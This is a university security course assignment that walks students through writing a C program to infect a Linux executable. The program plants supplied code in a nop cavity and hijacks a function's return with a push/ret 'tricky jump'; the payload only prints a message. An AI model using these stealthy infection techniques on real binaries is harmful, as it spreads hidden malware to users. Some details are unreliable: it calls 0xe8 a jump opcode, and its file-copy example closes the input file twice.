Assignment: TRICKY

Task
- Submission
Methodology and Hints

Changelog:

17 Feb 2017: clarified that question 2 is about the tricky jump to the virus code and not anything in the virus code itself
16 Feb 2017: added note in hints about how the virus code returns (and what would be wrong if it segfaults instead)
16 Feb 2017: correct gramatical error in “Task”
14 Feb 2017: added note about chmod +x
14 Feb 2017: corrected erroneous use of fseek return value in file reading code example below.
11 Feb 2017: The supplied virus code .s and .o included an extra newline in the string to print (but the assembly code on this page did not include it); corrected .s and .o files to not include the newline. (We will accept either version of the virus code being inserted.)

This assignment will explore what it takes to create a stealthy virus that employs a “tricky jump.” A tricky jump is a form of hijacking in which a jump is inserted to call some virus code. The jump is inserted in such a way that after the virus code runs, the program continues normal execution, thereby maintaining stealth.

Task

A “tricky jump” can be efficiently implemented (only six bytes) as:

pushq $AddressOfVirusFunction
ret

This can be encoded on x86-64 using only six bytes, and the encoding does not change based on where the push instruction is placed. This makes it easy to compute the machine code seperately from inserting it somewhere, and so has been commonly seen in viruses.

One could also implement a “tricky jump” by inserting a conventional jump instruction:

jmp AddressOfVirusFunction

but the address will be encoded relatively, so the resulting machine code will change based on where the jump is inserted.

When either sequence is executed, control is diverted to the virus code. When the virus code returns, control returns to the function that called the function the at contained the tricky jump. If the virus writer inserts the tricky jump at the end of an application function (i.e, to replace the ret), then the program, after the virus code executes, will continue to run as if nothing happened. For example, one might see code like like:

  400661:       c3                      retq       
  400662:       66 66 66 66 66 2e 0f    data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1)
  400669:       1f 84 00 00 00 00 00 

data32 data32 data32 data32 nopw %cs:0x0(%rax,%rax,1) is objdump’s representation of a 14-byte long nop instruction. This is padding added at the end of the function. This is a “cavity” that gives a virus writer some room to work. If we insert a “tricky jump” starting where the retq instruction is located (address 0x400661), then the virus code will be invoked. When the virus code returns, control will be returned to the function that invoked this function.

For this assignment, you will write a C program that infects a particular Linux executable and causes some virus code to be executed.

The Linux executable you want to infect is called target.exe. target.exe produces the following output:

Initialize application.
Begin application execution.
Terminate application.

(After downloading target.exe, you may need to mark it as executable with a command like chmod +x target.exe. Then you should be able to run it using ./target.exe.)

Your program should modify target.exe into a target-infected.exe which will produce the following output:

Initialize application.
You have been infected with a virus!
Begin application execution.
Terminate application. 

You will use the “tricky jump” method of infection. The push version is probably the easiest to use, but you may use any technique. To simplify this assignment:

The executable has a large “hole” (unused space filled with nops) in which to place the non-malicious “virus code”, and we will supply working “virus code” for you.
You only need to handle infecting this particular executable, but we expect your infection program to be fairly easy to port to new executables. (For example, you should not just have a copy of the output file inside your C file.)

The “virus” code we want you to insert is the following (also available as a .s file or a .o file):

    leal string(%rip), %edi
    pushq $0x4004e0 /* address of puts in target executable */
    retq
string: 
    .asciz "You have been infected with a virus!"

You can copy the resulting machine code into the large cavity in the executable. This assembly code is carefully written to not require changes to the machine code depending on where in the executable it is. (This is why it does not call puts with a jmp or call instruction or use mov $string, %edi.) It will, however, not work in other executables because it hard-codes the address of puts in this executable. (The simplest way to avoid this problem would be to replace the call to puts with a direct use of the system call used to implement puts.)

Submit a C program that when compiled an executed reads a C executable called target.exe and produces an executable called target-infected.exe. target-infected.exe must be the same length as target.exe.

Also, answer the following questions:

How did you identify the file offsets in target.exe to overwrite?
How did you produce the machine code to insert for the tricky jump to the virus code?
If your infect.c has a hard-coded offset or something similar, how would you automate finding the location in target.exe to overwrite with a tricky jump so that it would work on other target programs? (For this question, ignore the problem of fixing the inserted “virus” code to work in other executables.)

Submission

Submit the following files:

your infect.c
the target-infected.exe your infect.c produced.
a file answers.txt containing the answers to the above questions.

Methodology and Hints

You should use the utility objdump to examine the executable target.exe. The option --disassemble is useful. In particular, you need to determine the starting address of the virus code. The dissasembly will also help you determine the opcodes of the instructions that you need to insert (i.e., a push instruction and a ret instruction). You may wish to consult the objdump manual.
Identify where the constant stings “Initialize appliation.” and “Begin application execution.” are referenced to locate relevant parts of the application code.
Look for a large area of nops in the disassembly to determine where to insert the virus code. Record the address of this location in memory to generate the “tricky jump” code you will insert elsewhere in the executable.
To insert both the virus code and the tricky jump itself, the trick is that you must map the address of the location in the executable to the offset of the proper byte in the file. You need to do this mapping because the file offset where you want to write is not the same as the address of the instruction when the program is loaded in memory (which is what objdump usually shows you).
- One option is to figure out what options you can pass to objdump to get it to display the offset of code within the executable file.
- Another option is to get a hexadecimal dump of the raw file and look for bytes shown in objdump output in the actual executable file to find their location.
- Yet another option would be for your infect.c to search for particular bytes in the executable file itself.
A push of a 32-bit constant (on 32- or 64-bit x86) can be encoded as an 0x68 byte followed by the (little-endian) constant. A ret is encded as c3. A jump can be encoded as an 0xe8 byte followed by a 32-bit offset from the address of the following instruction.
A very useful program to examine the file is a hex editor such as ghex. You can install ghex using sudo apt-get install ghex.
To simplify the assignment, you can hardcode the input and output file names in your infect program. That is, infect.c opens and reads target.exe and opens and writes target-infected.exe. After you produce target-infected.exe you will probably need to set the execute permissions on the file.

To read from and write to a binary file in C, you can use fopen, fread, and fwrite. You can run man fopen, man fread, etc. to get documentation for how these functions are called, or search online. An example usage of a program that copies “input.dat” to “output.dat” is the following:

 #include <stdio.h> 
 #include <stdlib.h>

 int main(void) { 
     FILE *in;
     FILE *out;
     char *buffer;
     int size;
     in = fopen("input.dat", "rb");
     /* get size of input.dat, by 
        moving to the end of the file */
     fseek(in, 0, SEEK_END);
     size = ftell(in);
     /* then, return to the
        beginning of the file */
     fseek(in, 0, SEEK_SET);
     buffer = malloc(size);
     fread(buffer, 1, size, in);
     fclose(in);
     out = fopen("output.dat", "wb");
     fwrite(buffer, 1, size, out);
     fclose(in);
 }

The hard part is figuring out what locations in the file need to be changed and what they should be changed to. The code to do the infection is small.
We are reading and writing binary files—not textfiles. You may need to open files in binary mode, next text mode.
The virus code we’ve given finishes by returning with a ret instruction. (This is actually by returning from puts.) So whereever you insert the virus function needs to be a place where it is safe to return from. If you are experiencing a segfault after the virus code prints out its message, this is the most likely reason why.